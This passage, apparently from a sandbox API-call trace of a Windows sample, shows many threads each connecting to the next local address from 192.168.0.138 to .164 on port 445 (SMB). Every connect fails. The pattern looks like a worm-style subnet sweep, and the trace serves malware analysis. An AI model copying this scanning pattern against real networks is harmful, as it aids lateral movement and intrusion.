connect (s=0xd0c, name=0x1613fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.138"), namelen=16) returned -1 [0164.947] GetCurrentThreadId () returned 0xf9c [0164.947] GetCurrentThreadId () returned 0xf9c [0164.947] longjmp () [0164.947] GetCurrentThreadId () returned 0xf9c [0164.947] CloseHandle (hObject=0xcfc) returned 1 [0164.947] GetCurrentThreadId () returned 0xf9c [0164.948] Sleep (dwMilliseconds=0x0) [0165.003] _endthreadex (_ReturnCode=0x0) Thread: id = 934 os_tid = 0xf98 [0143.805] GetCurrentThreadId () returned 0xf98 [0143.805] GetCurrentThreadId () returned 0xf98 [0143.805] GetCurrentThreadId () returned 0xf98 [0143.805] _errno () returned 0x29266b8 [0143.805] wcslen (_String="192.168.0.139") returned 0xd [0143.805] wcstombs (in: _Dest=0x2935700, _Source="192.168.0.139", _MaxCount=0xe | out: _Dest="192.168.0.139") returned 0xd [0143.805] htons (hostshort=0x1bd) returned 0xbd01 [0143.805] inet_addr (cp="192.168.0.139") returned 0x8b00a8c0 [0143.805] socket (af=2, type=1, protocol=0) returned 0xd20 [0143.806] connect (s=0xd20, name=0x1637fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.139"), namelen=16) returned -1 [0164.948] GetCurrentThreadId () returned 0xf98 [0164.948] GetCurrentThreadId () returned 0xf98 [0164.948] longjmp () [0164.948] GetCurrentThreadId () returned 0xf98 [0164.948] CloseHandle (hObject=0xd10) returned 1 [0164.948] GetCurrentThreadId () returned 0xf98 [0164.948] Sleep (dwMilliseconds=0x0) [0165.003] _endthreadex (_ReturnCode=0x0) Thread: id = 935 os_tid = 0xfec [0143.807] GetCurrentThreadId () returned 0xfec [0143.807] GetCurrentThreadId () returned 0xfec [0143.807] GetCurrentThreadId () returned 0xfec [0143.807] _errno () returned 0x2926b08 [0143.807] wcslen (_String="192.168.0.140") returned 0xd [0143.807] wcstombs (in: _Dest=0x29326e8, _Source="192.168.0.140", _MaxCount=0xe | out: _Dest="192.168.0.140") returned 0xd [0143.807] htons (hostshort=0x1bd) returned 0xbd01 [0143.807] inet_addr (cp="192.168.0.140") returned 0x8c00a8c0 [0143.807] socket (af=2, type=1, protocol=0) returned 0xd34 [0143.808] connect (s=0xd34, name=0x165bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.140"), namelen=16) returned -1 [0164.948] GetCurrentThreadId () returned 0xfec [0164.948] GetCurrentThreadId () returned 0xfec [0164.948] longjmp () [0164.948] GetCurrentThreadId () returned 0xfec [0164.948] CloseHandle (hObject=0xd24) returned 1 [0164.948] GetCurrentThreadId () returned 0xfec [0164.948] Sleep (dwMilliseconds=0x0) [0165.004] _endthreadex (_ReturnCode=0x0) Thread: id = 936 os_tid = 0xf90 [0143.809] GetCurrentThreadId () returned 0xf90 [0143.809] GetCurrentThreadId () returned 0xf90 [0143.809] GetCurrentThreadId () returned 0xf90 [0143.809] _errno () returned 0x2927180 [0143.810] wcslen (_String="192.168.0.141") returned 0xd [0143.810] wcstombs (in: _Dest=0x2937710, _Source="192.168.0.141", _MaxCount=0xe | out: _Dest="192.168.0.141") returned 0xd [0143.810] htons (hostshort=0x1bd) returned 0xbd01 [0143.810] inet_addr (cp="192.168.0.141") returned 0x8d00a8c0 [0143.810] socket (af=2, type=1, protocol=0) returned 0xd48 [0143.810] connect (s=0xd48, name=0x167ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.141"), namelen=16) returned -1 [0164.948] GetCurrentThreadId () returned 0xf90 [0164.948] GetCurrentThreadId () returned 0xf90 [0164.948] longjmp () [0164.948] GetCurrentThreadId () returned 0xf90 [0164.948] CloseHandle (hObject=0xd38) returned 1 [0164.948] GetCurrentThreadId () returned 0xf90 [0164.948] Sleep (dwMilliseconds=0x0) [0165.005] _endthreadex (_ReturnCode=0x0) Thread: id = 937 os_tid = 0xfa0 [0143.812] GetCurrentThreadId () returned 0xfa0 [0143.812] GetCurrentThreadId () returned 0xfa0 [0143.812] GetCurrentThreadId () returned 0xfa0 [0143.812] _errno () returned 0x29275d0 [0143.812] wcslen (_String="192.168.0.142") returned 0xd [0143.812] wcstombs (in: _Dest=0x2936708, _Source="192.168.0.142", _MaxCount=0xe | out: _Dest="192.168.0.142") returned 0xd [0143.812] htons (hostshort=0x1bd) returned 0xbd01 [0143.812] inet_addr (cp="192.168.0.142") returned 0x8e00a8c0 [0143.812] socket (af=2, type=1, protocol=0) returned 0xd5c [0143.812] connect (s=0xd5c, name=0x16a3fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.142"), namelen=16) returned -1 [0164.948] GetCurrentThreadId () returned 0xfa0 [0164.948] GetCurrentThreadId () returned 0xfa0 [0164.948] longjmp () [0164.948] GetCurrentThreadId () returned 0xfa0 [0164.948] CloseHandle (hObject=0xd4c) returned 1 [0164.948] GetCurrentThreadId () returned 0xfa0 [0164.948] Sleep (dwMilliseconds=0x0) [0165.005] _endthreadex (_ReturnCode=0x0) Thread: id = 938 os_tid = 0xfdc [0143.813] GetCurrentThreadId () returned 0xfdc [0143.813] GetCurrentThreadId () returned 0xfdc [0143.813] GetCurrentThreadId () returned 0xfdc [0143.813] _errno () returned 0x28fdf48 [0143.813] wcslen (_String="192.168.0.143") returned 0xd [0143.813] wcstombs (in: _Dest=0x2939720, _Source="192.168.0.143", _MaxCount=0xe | out: _Dest="192.168.0.143") returned 0xd [0143.813] htons (hostshort=0x1bd) returned 0xbd01 [0143.813] inet_addr (cp="192.168.0.143") returned 0x8f00a8c0 [0143.813] socket (af=2, type=1, protocol=0) returned 0xd70 [0143.814] connect (s=0xd70, name=0x16c7fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.143"), namelen=16) returned -1 [0164.949] GetCurrentThreadId () returned 0xfdc [0164.949] GetCurrentThreadId () returned 0xfdc [0164.949] longjmp () [0164.949] GetCurrentThreadId () returned 0xfdc [0164.949] CloseHandle (hObject=0xd60) returned 1 [0164.949] GetCurrentThreadId () returned 0xfdc [0164.949] Sleep (dwMilliseconds=0x0) [0165.006] _endthreadex (_ReturnCode=0x0) Thread: id = 939 os_tid = 0xfa4 [0143.815] GetCurrentThreadId () returned 0xfa4 [0143.815] GetCurrentThreadId () returned 0xfa4 [0143.815] GetCurrentThreadId () returned 0xfa4 [0143.815] _errno () returned 0x294a458 [0143.815] wcslen (_String="192.168.0.144") returned 0xd [0143.815] wcstombs (in: _Dest=0x293f750, _Source="192.168.0.144", _MaxCount=0xe | out: _Dest="192.168.0.144") returned 0xd [0143.815] htons (hostshort=0x1bd) returned 0xbd01 [0143.815] inet_addr (cp="192.168.0.144") returned 0x9000a8c0 [0143.815] socket (af=2, type=1, protocol=0) returned 0xd84 [0143.815] connect (s=0xd84, name=0x16ebfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.144"), namelen=16) returned -1 [0165.132] GetCurrentThreadId () returned 0xfa4 [0165.132] GetCurrentThreadId () returned 0xfa4 [0165.132] longjmp () [0165.132] GetCurrentThreadId () returned 0xfa4 [0165.132] CloseHandle (hObject=0xd74) returned 1 [0165.132] GetCurrentThreadId () returned 0xfa4 [0165.132] Sleep (dwMilliseconds=0x0) [0165.159] _endthreadex (_ReturnCode=0x0) Thread: id = 940 os_tid = 0xfe8 [0143.816] GetCurrentThreadId () returned 0xfe8 [0143.816] GetCurrentThreadId () returned 0xfe8 [0143.817] GetCurrentThreadId () returned 0xfe8 [0143.817] _errno () returned 0x294d3c8 [0143.817] wcslen (_String="192.168.0.145") returned 0xd [0143.817] wcstombs (in: _Dest=0x2938718, _Source="192.168.0.145", _MaxCount=0xe | out: _Dest="192.168.0.145") returned 0xd [0143.817] htons (hostshort=0x1bd) returned 0xbd01 [0143.817] inet_addr (cp="192.168.0.145") returned 0x9100a8c0 [0143.817] socket (af=2, type=1, protocol=0) returned 0xd98 [0143.817] connect (s=0xd98, name=0x170ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.145"), namelen=16) returned -1 [0165.133] GetCurrentThreadId () returned 0xfe8 [0165.133] GetCurrentThreadId () returned 0xfe8 [0165.133] longjmp () [0165.133] GetCurrentThreadId () returned 0xfe8 [0165.133] CloseHandle (hObject=0xd88) returned 1 [0165.133] GetCurrentThreadId () returned 0xfe8 [0165.133] Sleep (dwMilliseconds=0x0) [0165.159] _endthreadex (_ReturnCode=0x0) Thread: id = 941 os_tid = 0x168 [0143.818] GetCurrentThreadId () returned 0x168 [0143.818] GetCurrentThreadId () returned 0x168 [0143.818] GetCurrentThreadId () returned 0x168 [0143.818] _errno () returned 0x294d5f0 [0143.818] wcslen (_String="192.168.0.146") returned 0xd [0143.818] wcstombs (in: _Dest=0x293d740, _Source="192.168.0.146", _MaxCount=0xe | out: _Dest="192.168.0.146") returned 0xd [0143.818] htons (hostshort=0x1bd) returned 0xbd01 [0143.818] inet_addr (cp="192.168.0.146") returned 0x9200a8c0 [0143.818] socket (af=2, type=1, protocol=0) returned 0xdac [0143.818] connect (s=0xdac, name=0x1733fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.146"), namelen=16) returned -1 [0165.133] GetCurrentThreadId () returned 0x168 [0165.133] GetCurrentThreadId () returned 0x168 [0165.133] longjmp () [0165.133] GetCurrentThreadId () returned 0x168 [0165.133] CloseHandle (hObject=0xd9c) returned 1 [0165.133] GetCurrentThreadId () returned 0x168 [0165.133] Sleep (dwMilliseconds=0x0) [0165.160] _endthreadex (_ReturnCode=0x0) Thread: id = 942 os_tid = 0xc18 [0143.819] GetCurrentThreadId () returned 0xc18 [0143.819] GetCurrentThreadId () returned 0xc18 [0143.820] GetCurrentThreadId () returned 0xc18 [0143.820] _errno () returned 0x294d818 [0143.820] wcslen (_String="192.168.0.147") returned 0xd [0143.820] wcstombs (in: _Dest=0x2940758, _Source="192.168.0.147", _MaxCount=0xe | out: _Dest="192.168.0.147") returned 0xd [0143.820] htons (hostshort=0x1bd) returned 0xbd01 [0143.820] inet_addr (cp="192.168.0.147") returned 0x9300a8c0 [0143.820] socket (af=2, type=1, protocol=0) returned 0xdc0 [0143.820] connect (s=0xdc0, name=0x1757fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.147"), namelen=16) returned -1 [0165.133] GetCurrentThreadId () returned 0xc18 [0165.133] GetCurrentThreadId () returned 0xc18 [0165.133] longjmp () [0165.133] GetCurrentThreadId () returned 0xc18 [0165.133] CloseHandle (hObject=0xdb0) returned 1 [0165.133] GetCurrentThreadId () returned 0xc18 [0165.133] Sleep (dwMilliseconds=0x0) [0165.160] _endthreadex (_ReturnCode=0x0) Thread: id = 943 os_tid = 0xff4 [0143.821] GetCurrentThreadId () returned 0xff4 [0143.821] GetCurrentThreadId () returned 0xff4 [0143.821] GetCurrentThreadId () returned 0xff4 [0143.821] _errno () returned 0x294c060 [0143.821] wcslen (_String="192.168.0.148") returned 0xd [0143.821] wcstombs (in: _Dest=0x2941760, _Source="192.168.0.148", _MaxCount=0xe | out: _Dest="192.168.0.148") returned 0xd [0143.821] htons (hostshort=0x1bd) returned 0xbd01 [0143.821] inet_addr (cp="192.168.0.148") returned 0x9400a8c0 [0143.821] socket (af=2, type=1, protocol=0) returned 0xdd4 [0143.821] connect (s=0xdd4, name=0x177bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.148"), namelen=16) returned -1 [0165.133] GetCurrentThreadId () returned 0xff4 [0165.133] GetCurrentThreadId () returned 0xff4 [0165.133] longjmp () [0165.133] GetCurrentThreadId () returned 0xff4 [0165.133] CloseHandle (hObject=0xdc4) returned 1 [0165.133] GetCurrentThreadId () returned 0xff4 [0165.133] Sleep (dwMilliseconds=0x0) [0165.161] _endthreadex (_ReturnCode=0x0) Thread: id = 944 os_tid = 0x604 [0143.823] GetCurrentThreadId () returned 0x604 [0143.823] GetCurrentThreadId () returned 0x604 [0143.823] GetCurrentThreadId () returned 0x604 [0143.823] _errno () returned 0x294c900 [0143.823] wcslen (_String="192.168.0.149") returned 0xd [0143.823] wcstombs (in: _Dest=0x293b730, _Source="192.168.0.149", _MaxCount=0xe | out: _Dest="192.168.0.149") returned 0xd [0143.823] htons (hostshort=0x1bd) returned 0xbd01 [0143.823] inet_addr (cp="192.168.0.149") returned 0x9500a8c0 [0143.823] socket (af=2, type=1, protocol=0) returned 0xde8 [0143.823] connect (s=0xde8, name=0x179ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.149"), namelen=16) returned -1 [0165.134] GetCurrentThreadId () returned 0x604 [0165.134] GetCurrentThreadId () returned 0x604 [0165.134] longjmp () [0165.134] GetCurrentThreadId () returned 0x604 [0165.134] CloseHandle (hObject=0xdd8) returned 1 [0165.134] GetCurrentThreadId () returned 0x604 [0165.134] Sleep (dwMilliseconds=0x0) [0165.161] _endthreadex (_ReturnCode=0x0) Thread: id = 945 os_tid = 0x9cc [0143.824] GetCurrentThreadId () returned 0x9cc [0143.824] GetCurrentThreadId () returned 0x9cc [0143.824] GetCurrentThreadId () returned 0x9cc [0143.824] _errno () returned 0x294cb28 [0143.824] wcslen (_String="192.168.0.150") returned 0xd [0143.824] wcstombs (in: _Dest=0x293c738, _Source="192.168.0.150", _MaxCount=0xe | out: _Dest="192.168.0.150") returned 0xd [0143.824] htons (hostshort=0x1bd) returned 0xbd01 [0143.824] inet_addr (cp="192.168.0.150") returned 0x9600a8c0 [0143.824] socket (af=2, type=1, protocol=0) returned 0xdfc [0143.825] connect (s=0xdfc, name=0x17c3fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.150"), namelen=16) returned -1 [0165.134] GetCurrentThreadId () returned 0x9cc [0165.134] GetCurrentThreadId () returned 0x9cc [0165.134] longjmp () [0165.134] GetCurrentThreadId () returned 0x9cc [0165.134] CloseHandle (hObject=0xdec) returned 1 [0165.134] GetCurrentThreadId () returned 0x9cc [0165.134] Sleep (dwMilliseconds=0x0) [0165.162] _endthreadex (_ReturnCode=0x0) Thread: id = 946 os_tid = 0xfd8 [0143.826] GetCurrentThreadId () returned 0xfd8 [0143.826] GetCurrentThreadId () returned 0xfd8 [0143.826] GetCurrentThreadId () returned 0xfd8 [0143.826] _errno () returned 0x294cd50 [0143.826] wcslen (_String="192.168.0.151") returned 0xd [0143.826] wcstombs (in: _Dest=0x293e748, _Source="192.168.0.151", _MaxCount=0xe | out: _Dest="192.168.0.151") returned 0xd [0143.826] htons (hostshort=0x1bd) returned 0xbd01 [0143.826] inet_addr (cp="192.168.0.151") returned 0x9700a8c0 [0143.826] socket (af=2, type=1, protocol=0) returned 0xe10 [0143.826] connect (s=0xe10, name=0x17e7fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.151"), namelen=16) returned -1 [0165.134] GetCurrentThreadId () returned 0xfd8 [0165.134] GetCurrentThreadId () returned 0xfd8 [0165.134] longjmp () [0165.134] GetCurrentThreadId () returned 0xfd8 [0165.134] CloseHandle (hObject=0xe00) returned 1 [0165.134] GetCurrentThreadId () returned 0xfd8 [0165.134] Sleep (dwMilliseconds=0x0) [0165.163] _endthreadex (_ReturnCode=0x0) Thread: id = 947 os_tid = 0xf0 [0143.827] GetCurrentThreadId () returned 0xf0 [0143.827] GetCurrentThreadId () returned 0xf0 [0143.827] GetCurrentThreadId () returned 0xf0 [0143.827] _errno () returned 0x294cf78 [0143.827] wcslen (_String="192.168.0.152") returned 0xd [0143.827] wcstombs (in: _Dest=0x293a728, _Source="192.168.0.152", _MaxCount=0xe | out: _Dest="192.168.0.152") returned 0xd [0143.827] htons (hostshort=0x1bd) returned 0xbd01 [0143.827] inet_addr (cp="192.168.0.152") returned 0x9800a8c0 [0143.827] socket (af=2, type=1, protocol=0) returned 0xe24 [0143.827] connect (s=0xe24, name=0x180bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.152"), namelen=16) returned -1 [0165.134] GetCurrentThreadId () returned 0xf0 [0165.134] GetCurrentThreadId () returned 0xf0 [0165.134] longjmp () [0165.134] GetCurrentThreadId () returned 0xf0 [0165.134] CloseHandle (hObject=0xe14) returned 1 [0165.134] GetCurrentThreadId () returned 0xf0 [0165.134] Sleep (dwMilliseconds=0x0) [0165.163] _endthreadex (_ReturnCode=0x0) Thread: id = 948 os_tid = 0xfe4 [0143.829] GetCurrentThreadId () returned 0xfe4 [0143.829] GetCurrentThreadId () returned 0xfe4 [0143.829] GetCurrentThreadId () returned 0xfe4 [0143.829] _errno () returned 0x294d1a0 [0143.829] wcslen (_String="192.168.0.153") returned 0xd [0143.829] wcstombs (in: _Dest=0x2943770, _Source="192.168.0.153", _MaxCount=0xe | out: _Dest="192.168.0.153") returned 0xd [0143.829] htons (hostshort=0x1bd) returned 0xbd01 [0143.829] inet_addr (cp="192.168.0.153") returned 0x9900a8c0 [0143.829] socket (af=2, type=1, protocol=0) returned 0xe38 [0143.829] connect (s=0xe38, name=0x182ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.153"), namelen=16) returned -1 [0165.134] GetCurrentThreadId () returned 0xfe4 [0165.135] GetCurrentThreadId () returned 0xfe4 [0165.135] longjmp () [0165.135] GetCurrentThreadId () returned 0xfe4 [0165.135] CloseHandle (hObject=0xe28) returned 1 [0165.135] GetCurrentThreadId () returned 0xfe4 [0165.135] Sleep (dwMilliseconds=0x0) [0165.164] _endthreadex (_ReturnCode=0x0) Thread: id = 949 os_tid = 0xfe0 [0143.830] GetCurrentThreadId () returned 0xfe0 [0143.830] GetCurrentThreadId () returned 0xfe0 [0143.830] GetCurrentThreadId () returned 0xfe0 [0143.830] _errno () returned 0x2949bb8 [0143.830] wcslen (_String="192.168.0.154") returned 0xd [0143.830] wcstombs (in: _Dest=0x2944778, _Source="192.168.0.154", _MaxCount=0xe | out: _Dest="192.168.0.154") returned 0xd [0143.830] htons (hostshort=0x1bd) returned 0xbd01 [0143.830] inet_addr (cp="192.168.0.154") returned 0x9a00a8c0 [0143.830] socket (af=2, type=1, protocol=0) returned 0xe4c [0143.830] connect (s=0xe4c, name=0x1853fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.154"), namelen=16) returned -1 [0165.135] GetCurrentThreadId () returned 0xfe0 [0165.135] GetCurrentThreadId () returned 0xfe0 [0165.135] longjmp () [0165.135] GetCurrentThreadId () returned 0xfe0 [0165.135] CloseHandle (hObject=0xe3c) returned 1 [0165.135] GetCurrentThreadId () returned 0xfe0 [0165.135] Sleep (dwMilliseconds=0x0) [0165.164] _endthreadex (_ReturnCode=0x0) Thread: id = 950 os_tid = 0xfc0 [0143.831] GetCurrentThreadId () returned 0xfc0 [0143.831] GetCurrentThreadId () returned 0xfc0 [0143.832] GetCurrentThreadId () returned 0xfc0 [0143.832] _errno () returned 0x294a008 [0143.832] wcslen (_String="192.168.0.155") returned 0xd [0143.832] wcstombs (in: _Dest=0x2945780, _Source="192.168.0.155", _MaxCount=0xe | out: _Dest="192.168.0.155") returned 0xd [0143.832] htons (hostshort=0x1bd) returned 0xbd01 [0143.832] inet_addr (cp="192.168.0.155") returned 0x9b00a8c0 [0143.832] socket (af=2, type=1, protocol=0) returned 0xe60 [0143.832] connect (s=0xe60, name=0x1877fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.155"), namelen=16) returned -1 [0165.135] GetCurrentThreadId () returned 0xfc0 [0165.135] GetCurrentThreadId () returned 0xfc0 [0165.135] longjmp () [0165.135] GetCurrentThreadId () returned 0xfc0 [0165.135] CloseHandle (hObject=0xe50) returned 1 [0165.135] GetCurrentThreadId () returned 0xfc0 [0165.135] Sleep (dwMilliseconds=0x0) [0165.165] _endthreadex (_ReturnCode=0x0) Thread: id = 951 os_tid = 0x778 [0143.833] GetCurrentThreadId () returned 0x778 [0143.833] GetCurrentThreadId () returned 0x778 [0143.833] GetCurrentThreadId () returned 0x778 [0143.833] _errno () returned 0x294a230 [0143.833] wcslen (_String="192.168.0.156") returned 0xd [0143.833] wcstombs (in: _Dest=0x2946788, _Source="192.168.0.156", _MaxCount=0xe | out: _Dest="192.168.0.156") returned 0xd [0143.833] htons (hostshort=0x1bd) returned 0xbd01 [0143.833] inet_addr (cp="192.168.0.156") returned 0x9c00a8c0 [0143.833] socket (af=2, type=1, protocol=0) returned 0xe74 [0143.833] connect (s=0xe74, name=0x189bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.156"), namelen=16) returned -1 [0165.135] GetCurrentThreadId () returned 0x778 [0165.135] GetCurrentThreadId () returned 0x778 [0165.135] longjmp () [0165.135] GetCurrentThreadId () returned 0x778 [0165.135] CloseHandle (hObject=0xe64) returned 1 [0165.135] GetCurrentThreadId () returned 0x778 [0165.135] Sleep (dwMilliseconds=0x0) [0165.166] _endthreadex (_ReturnCode=0x0) Thread: id = 952 os_tid = 0xfbc [0143.834] GetCurrentThreadId () returned 0xfbc [0143.834] GetCurrentThreadId () returned 0xfbc [0143.834] GetCurrentThreadId () returned 0xfbc [0143.834] _errno () returned 0x2949de0 [0143.835] wcslen (_String="192.168.0.157") returned 0xd [0143.835] wcstombs (in: _Dest=0x2942768, _Source="192.168.0.157", _MaxCount=0xe | out: _Dest="192.168.0.157") returned 0xd [0143.835] htons (hostshort=0x1bd) returned 0xbd01 [0143.835] inet_addr (cp="192.168.0.157") returned 0x9d00a8c0 [0143.835] socket (af=2, type=1, protocol=0) returned 0xe88 [0143.835] connect (s=0xe88, name=0x18bffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.157"), namelen=16) returned -1 [0165.135] GetCurrentThreadId () returned 0xfbc [0165.135] GetCurrentThreadId () returned 0xfbc [0165.135] longjmp () [0165.136] GetCurrentThreadId () returned 0xfbc [0165.136] CloseHandle (hObject=0xe78) returned 1 [0165.136] GetCurrentThreadId () returned 0xfbc [0165.136] Sleep (dwMilliseconds=0x0) [0165.166] _endthreadex (_ReturnCode=0x0) Thread: id = 953 os_tid = 0xfd4 [0143.836] GetCurrentThreadId () returned 0xfd4 [0143.836] GetCurrentThreadId () returned 0xfd4 [0143.836] GetCurrentThreadId () returned 0xfd4 [0143.836] _errno () returned 0x294a8a8 [0143.839] wcslen (_String="192.168.0.158") returned 0xd [0143.839] wcstombs (in: _Dest=0x29523d8, _Source="192.168.0.158", _MaxCount=0xe | out: _Dest="192.168.0.158") returned 0xd [0143.839] htons (hostshort=0x1bd) returned 0xbd01 [0143.839] inet_addr (cp="192.168.0.158") returned 0x9e00a8c0 [0143.839] socket (af=2, type=1, protocol=0) returned 0xe9c [0143.839] connect (s=0xe9c, name=0x18e3fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.158"), namelen=16) returned -1 [0165.136] GetCurrentThreadId () returned 0xfd4 [0165.136] GetCurrentThreadId () returned 0xfd4 [0165.136] longjmp () [0165.136] GetCurrentThreadId () returned 0xfd4 [0165.136] CloseHandle (hObject=0xe8c) returned 1 [0165.136] GetCurrentThreadId () returned 0xfd4 [0165.136] Sleep (dwMilliseconds=0x0) [0165.167] _endthreadex (_ReturnCode=0x0) Thread: id = 954 os_tid = 0xff0 [0143.840] GetCurrentThreadId () returned 0xff0 [0143.840] GetCurrentThreadId () returned 0xff0 [0143.840] GetCurrentThreadId () returned 0xff0 [0143.840] _errno () returned 0x294a680 [0143.840] wcslen (_String="192.168.0.159") returned 0xd [0143.840] wcstombs (in: _Dest=0x29543e8, _Source="192.168.0.159", _MaxCount=0xe | out: _Dest="192.168.0.159") returned 0xd [0143.840] htons (hostshort=0x1bd) returned 0xbd01 [0143.840] inet_addr (cp="192.168.0.159") returned 0x9f00a8c0 [0143.840] socket (af=2, type=1, protocol=0) returned 0xeb0 [0143.840] connect (s=0xeb0, name=0x1907fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.159"), namelen=16) returned -1 [0165.136] GetCurrentThreadId () returned 0xff0 [0165.136] GetCurrentThreadId () returned 0xff0 [0165.136] longjmp () [0165.136] GetCurrentThreadId () returned 0xff0 [0165.136] CloseHandle (hObject=0xea0) returned 1 [0165.136] GetCurrentThreadId () returned 0xff0 [0165.136] Sleep (dwMilliseconds=0x0) [0165.167] _endthreadex (_ReturnCode=0x0) Thread: id = 955 os_tid = 0xc30 [0143.841] GetCurrentThreadId () returned 0xc30 [0143.841] GetCurrentThreadId () returned 0xc30 [0143.842] GetCurrentThreadId () returned 0xc30 [0143.842] _errno () returned 0x294aad0 [0143.842] wcslen (_String="192.168.0.160") returned 0xd [0143.842] wcstombs (in: _Dest=0x29553f0, _Source="192.168.0.160", _MaxCount=0xe | out: _Dest="192.168.0.160") returned 0xd [0143.842] htons (hostshort=0x1bd) returned 0xbd01 [0143.842] inet_addr (cp="192.168.0.160") returned 0xa000a8c0 [0143.842] socket (af=2, type=1, protocol=0) returned 0xec4 [0143.842] connect (s=0xec4, name=0x192bfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.160"), namelen=16) returned -1 [0165.136] GetCurrentThreadId () returned 0xc30 [0165.136] GetCurrentThreadId () returned 0xc30 [0165.136] longjmp () [0165.136] GetCurrentThreadId () returned 0xc30 [0165.136] CloseHandle (hObject=0xeb4) returned 1 [0165.136] GetCurrentThreadId () returned 0xc30 [0165.136] Sleep (dwMilliseconds=0x0) [0165.168] _endthreadex (_ReturnCode=0x0) Thread: id = 956 os_tid = 0xc40 [0143.843] GetCurrentThreadId () returned 0xc40 [0143.843] GetCurrentThreadId () returned 0xc40 [0143.843] GetCurrentThreadId () returned 0xc40 [0143.843] _errno () returned 0x294af20 [0143.843] wcslen (_String="192.168.0.161") returned 0xd [0143.843] wcstombs (in: _Dest=0x29563f8, _Source="192.168.0.161", _MaxCount=0xe | out: _Dest="192.168.0.161") returned 0xd [0143.843] htons (hostshort=0x1bd) returned 0xbd01 [0143.843] inet_addr (cp="192.168.0.161") returned 0xa100a8c0 [0143.843] socket (af=2, type=1, protocol=0) returned 0xed8 [0143.843] connect (s=0xed8, name=0x194ffe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.161"), namelen=16) returned -1 [0165.136] GetCurrentThreadId () returned 0xc40 [0165.136] GetCurrentThreadId () returned 0xc40 [0165.136] longjmp () [0165.136] GetCurrentThreadId () returned 0xc40 [0165.136] CloseHandle (hObject=0xec8) returned 1 [0165.137] GetCurrentThreadId () returned 0xc40 [0165.137] Sleep (dwMilliseconds=0x0) [0165.168] _endthreadex (_ReturnCode=0x0) Thread: id = 957 os_tid = 0xc4c [0143.845] GetCurrentThreadId () returned 0xc4c [0143.845] GetCurrentThreadId () returned 0xc4c [0143.845] GetCurrentThreadId () returned 0xc4c [0143.845] _errno () returned 0x294b148 [0143.845] wcslen (_String="192.168.0.162") returned 0xd [0143.845] wcstombs (in: _Dest=0x2957400, _Source="192.168.0.162", _MaxCount=0xe | out: _Dest="192.168.0.162") returned 0xd [0143.845] htons (hostshort=0x1bd) returned 0xbd01 [0143.845] inet_addr (cp="192.168.0.162") returned 0xa200a8c0 [0143.845] socket (af=2, type=1, protocol=0) returned 0xeec [0143.846] connect (s=0xeec, name=0x1973fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.162"), namelen=16) returned -1 [0165.137] GetCurrentThreadId () returned 0xc4c [0165.137] GetCurrentThreadId () returned 0xc4c [0165.137] longjmp () [0165.137] GetCurrentThreadId () returned 0xc4c [0165.137] CloseHandle (hObject=0xedc) returned 1 [0165.137] GetCurrentThreadId () returned 0xc4c [0165.137] Sleep (dwMilliseconds=0x0) [0165.169] _endthreadex (_ReturnCode=0x0) Thread: id = 958 os_tid = 0xc54 [0143.847] GetCurrentThreadId () returned 0xc54 [0143.847] GetCurrentThreadId () returned 0xc54 [0143.847] GetCurrentThreadId () returned 0xc54 [0143.847] _errno () returned 0x294b370 [0143.847] wcslen (_String="192.168.0.163") returned 0xd [0143.847] wcstombs (in: _Dest=0x29503c8, _Source="192.168.0.163", _MaxCount=0xe | out: _Dest="192.168.0.163") returned 0xd [0143.847] htons (hostshort=0x1bd) returned 0xbd01 [0143.847] inet_addr (cp="192.168.0.163") returned 0xa300a8c0 [0143.847] socket (af=2, type=1, protocol=0) returned 0xf00 [0143.847] connect (s=0xf00, name=0x1997fe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.163"), namelen=16) returned -1 [0165.137] GetCurrentThreadId () returned 0xc54 [0165.137] GetCurrentThreadId () returned 0xc54 [0165.137] longjmp () [0165.137] GetCurrentThreadId () returned 0xc54 [0165.137] CloseHandle (hObject=0xef0) returned 1 [0165.137] GetCurrentThreadId () returned 0xc54 [0165.137] Sleep (dwMilliseconds=0x0) [0165.170] _endthreadex (_ReturnCode=0x0) Thread: id = 959 os_tid = 0xc60 [0143.849] GetCurrentThreadId () returned 0xc60 [0143.849] GetCurrentThreadId () returned 0xc60 [0143.849] GetCurrentThreadId () returned 0xc60 [0143.849] _errno () returned 0x294acf8 [0143.849] wcslen (_String="192.168.0.164") returned 0xd [0143.849] wcstombs (in: _Dest=0x2958408, _Source="192.168.0.164", _MaxCount=0xe | out: _Dest="192.168.0.164") returned 0xd [0143.849] htons (hostshort=0x1bd) returned 0xbd01 [0143.849] inet_addr (cp="192.168.0.164") returned 0xa400a8c0 [0143.849] socket (af=2, type=1, protocol=0) returned 0xf14 [0143.849] connect (s=0xf14, name=0x19bbfe38*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.164"), namelen=16) returned -1 [0165.137] GetCurrentThreadId () returned 0xc60 [0165.137] GetCurrentThreadId () returned 0xc60 [0165.137] longjmp () [0165.137] GetCurrentThreadId () returned 0xc60 [0165.137] CloseHandle (hObject=0xf04) returned 1 [0165.137] GetCurrentThreadId () returned 0xc60 [0165.137] Sleep (dwMilliseconds=0x0) [0165.170] _endthreadex 